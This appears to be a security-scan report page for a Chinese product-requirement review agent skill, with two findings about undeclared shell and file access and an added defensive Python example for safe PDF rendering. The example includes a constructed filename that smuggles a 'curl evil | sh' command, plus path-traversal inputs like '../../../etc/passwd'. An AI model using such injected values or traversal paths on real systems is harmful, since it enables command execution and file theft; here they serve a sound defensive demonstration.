产品需求大法-评审沙盘 (Chinese skill name, roughly "Product Requirements Method: Review Sandbox")

Security checks across malware telemetry and agentic risk

Overview

This skill is a product-requirement review helper with a disclosed local PDF renderer and no evidence of hidden data access, persistence, exfiltration, or destructive behavior.

Install it if you want a Chinese-language product-requirement review workflow. Before it generates PDFs or Feishu documents, confirm the input and output paths the renderer will touch, and which Feishu account and target document it will write to, especially when the product plan is confidential.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (2)

Lp3

Medium
Category
MCP Least Privilege
Confidence
89% confidence
Finding
The skill instructs the agent to run local scripts and shell commands to render Markdown into PDF, which implies shell execution plus file read and write with no declared permission boundary. The mismatch matters because a skill that looks documentation-only can reach the environment and the filesystem; if the content it processes is adversarial or user-controlled (for example, a filename or a Markdown document supplied by someone else), that access can turn into unintended file reads, command execution, or abuse.
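The two practitioner checks this page asks for, confirming the paths before rendering (the install advice above) and keeping the Markdown-to-PDF step from becoming an unbounded shell, in one added example. This is illustrative code written for this page, not code from the 产品需求大法-评审沙盘 skill or from SkillSpector. It assumes a hypothetical renderer CLI named `md-to-pdf <input> <output>`; the approved directories and filenames are constructed for the demonstration.

```python
"""Pre-flight path confinement and shell-free invocation for a Markdown-to-PDF step.

Added example. `md-to-pdf` is a hypothetical renderer CLI, not a real tool name
taken from the skill; the directory roots used in __main__ and in the tests are
constructed.
"""
import shlex
import subprocess
from pathlib import Path


class PathPolicyError(ValueError):
    """Raised when a path escapes the directory the user approved."""


def confine(path: str, root: str) -> Path:
    """Resolve `path` (following symlinks and collapsing `..`) and require it to
    sit under `root`. Resolving before the containment test is what defeats
    `../` and symlink tricks; a string-prefix test on the raw path would not."""
    root_path = Path(root).resolve()
    raw = Path(path)
    candidate = (raw if raw.is_absolute() else root_path / raw).resolve()
    try:
        candidate.relative_to(root_path)
    except ValueError as exc:
        raise PathPolicyError(f"{candidate} is outside approved directory {root_path}") from exc
    return candidate


def unsafe_render_command(src: str, dst: str) -> str:
    """The pattern the Lp3 finding warns about: a shell command line built from
    user-controlled names. Passed to a shell, metacharacters in the filename
    become part of the command, not part of the argument."""
    return f"md-to-pdf {src} {dst}"


def build_render_argv(src: str, dst: str, in_root: str, out_root: str) -> list[str]:
    """Return an argv list for the renderer with both paths confined.

    No shell is involved, so `;`, `|` and spaces in a filename stay inside one
    literal argument. The output must be a .pdf under out_root so the step
    cannot be coaxed into overwriting an unrelated file such as a shell rc file.
    """
    src_path = confine(src, in_root)
    if src_path.suffix.lower() != ".md":
        raise PathPolicyError(f"input must be a .md file, got {src_path.name}")
    dst_path = confine(dst, out_root)
    if dst_path.suffix.lower() != ".pdf":
        raise PathPolicyError(f"output must be a .pdf file, got {dst_path.name}")
    return ["md-to-pdf", str(src_path), str(dst_path)]


def render(src: str, dst: str, in_root: str, out_root: str) -> subprocess.CompletedProcess:
    """Run the confined command without a shell; raises if the renderer fails."""
    argv = build_render_argv(src, dst, in_root, out_root)
    return subprocess.run(argv, check=True, shell=False, capture_output=True)


def shell_token_count(command_line: str) -> int:
    """How many words a POSIX shell would see in `command_line`; used below to
    show how an injected filename expands into extra tokens."""
    return len(shlex.split(command_line))


if __name__ == "__main__":
    in_root, out_root = "/srv/review/in", "/srv/review/out"      # constructed roots
    hostile = "plan; curl evil | sh.md"                           # constructed filename
    print("unsafe:", unsafe_render_command(hostile, "out.pdf"),
          "->", shell_token_count(unsafe_render_command(hostile, "out.pdf")), "shell words")
    print("argv:  ", build_render_argv(hostile, "q3.pdf", in_root, out_root))
    for bad in ("../../../etc/passwd", "/etc/passwd"):
        try:
            confine(bad, in_root)
        except PathPolicyError as err:
            print("rejected:", err)
```

Confining paths covers the finding's "file read/write without a boundary" half and the shell-free argv covers the "command execution" half, but neither constrains what the rendering engine itself does: a Chromium-based renderer (the Playwright/Chromium tooling mentioned in the next finding) will happily fetch remote images or scripts referenced from the Markdown, so a confidential plan should be rendered with network access withheld from that process as well.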

Tp4

High
Category
MCP Tool Poisoning
Confidence
94% confidence
Finding
The skill is presented as a product-review workflow, but it also drives local document-conversion and PDF-rendering tooling: scripts, Node.js, and Playwright/Chromium. This description-behavior mismatch is risky because users and reviewers may trust it as a pure content-generation skill, while it actually performs code-adjacent operations with filesystem and process-execution side effects.

VirusTotal

All 65 of 65 VirusTotal vendors reported this skill as clean (0 detections).